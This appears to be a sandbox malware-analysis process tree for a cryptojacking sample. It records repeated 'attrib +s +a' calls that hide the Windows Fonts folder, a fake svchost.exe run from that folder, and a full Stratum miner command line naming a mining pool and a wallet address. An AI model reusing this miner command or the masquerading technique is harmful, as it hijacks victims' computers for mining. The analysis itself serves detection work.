C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd /c attrib +s +a %SystemRoot%\Fonts
-
C:\Windows\SysWOW64\attrib.exe (depth 4)
attrib +s +a C:\Windows\Fonts
- Views/modifies file attributes
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
\??\c:\windows\Fonts\KvMonXP.exe"KvMonXP.exe" -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
Downloads